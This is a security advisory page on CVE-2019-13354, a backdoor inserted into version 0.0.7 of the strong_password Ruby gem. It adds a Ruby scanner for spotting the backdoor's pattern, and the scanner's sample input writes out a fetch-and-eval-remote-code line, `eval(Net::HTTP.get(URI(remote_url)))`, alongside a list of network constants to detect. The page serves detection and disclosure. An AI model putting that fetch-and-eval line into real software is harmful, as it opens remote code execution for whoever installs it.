
CVE-2019-13354: strong_password Ruby gem malicious version causing Remote Code Execution vulnerability

CVSS Score: 9.8 (CVSS v3.0)

Basic Information

EPSS Score: 0.71714%
Published: 7/8/2019
Updated: 11/4/2023
KEV Status: No
Technology: Ruby

Technical Details

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name     Ecosystem  Vulnerable Versions  First Patched Version
strong_password  rubygems   = 0.0.7              0.0.8

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The vulnerability stems from malicious code added in version 0.0.7. The `_!` method is explicitly defined to execute code blocks while suppressing exceptions. It is immediately invoked to start a background thread that fetches and evaluates remote code (via `eval(Net::HTTP.get(...))`), enabling RCE. This matches CWE-94 (Code Injection) and aligns with third-party analyses confirming the backdoor's behavior. The code was removed in version 0.0.8, confirming its malicious role.
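As an added example (not Miggo's analysis code and not the gem's own source), the following Ripper-based scan flags eval-style calls whose argument expression references a network constant, i.e. the fetch-and-eval shape described above; the sample source, its `remote_url` variable and the constant list are constructed for illustration.

```ruby
require 'ripper'

# Heuristic: constants that indicate the evaluated string came off the network.
NETWORK_CONSTS = %w[Net HTTP HTTPS OpenURI URI Socket TCPSocket].freeze
EVAL_METHODS   = %w[eval instance_eval class_eval module_eval].freeze

# Lex Ruby source and return one finding per eval-style call whose arguments
# (up to the end of the statement) mention a network constant, e.g.
# eval(Net::HTTP.get(...)). Each finding is {line:, method:, consts:}.
def suspicious_evals(source)
  tokens = Ripper.lex(source)          # [[line, col], type, text, ...]
  findings = []
  tokens.each_with_index do |(pos, type, text), i|
    next unless type == :on_ident && EVAL_METHODS.include?(text)
    depth  = 0                          # paren nesting relative to the eval call
    consts = []
    tokens[(i + 1)..-1].each do |(_, t, s)|
      case t
      when :on_lparen then depth += 1
      when :on_rparen then depth -= 1
      when :on_const  then consts << s if NETWORK_CONSTS.include?(s)
      when :on_nl, :on_semicolon then break if depth <= 0
      end
      break if depth < 0                # closed the enclosing call's paren
    end
    next if consts.empty?
    findings << { line: pos[0], method: text, consts: consts.uniq }
  end
  findings
end

# Constructed sample: a benign eval, the fetch-and-eval pattern, and an eval
# over a local file that must not be flagged.
SAMPLE = <<~RUBY
  result = eval("1 + 1")
  Thread.new { eval(Net::HTTP.get(URI(remote_url))) }
  Kernel.eval File.read("local.rb")
RUBY

if __FILE__ == $PROGRAM_NAME
  suspicious_evals(SAMPLE).each do |f|
    puts "line #{f[:line]}: #{f[:method]} over #{f[:consts].join(', ')}"
  end
end
```

Running the scan over an unpacked gem (`gem unpack strong_password -v 0.0.7`) and feeding each `.rb` file to `suspicious_evals` gives a quick triage signal; it is a lexer heuristic, so review every hit by hand.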


WAF Protection Rules

WAF Rule

The strong_password gem 0.0.7 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. Version 0.0.8 does not contain the backdoor.
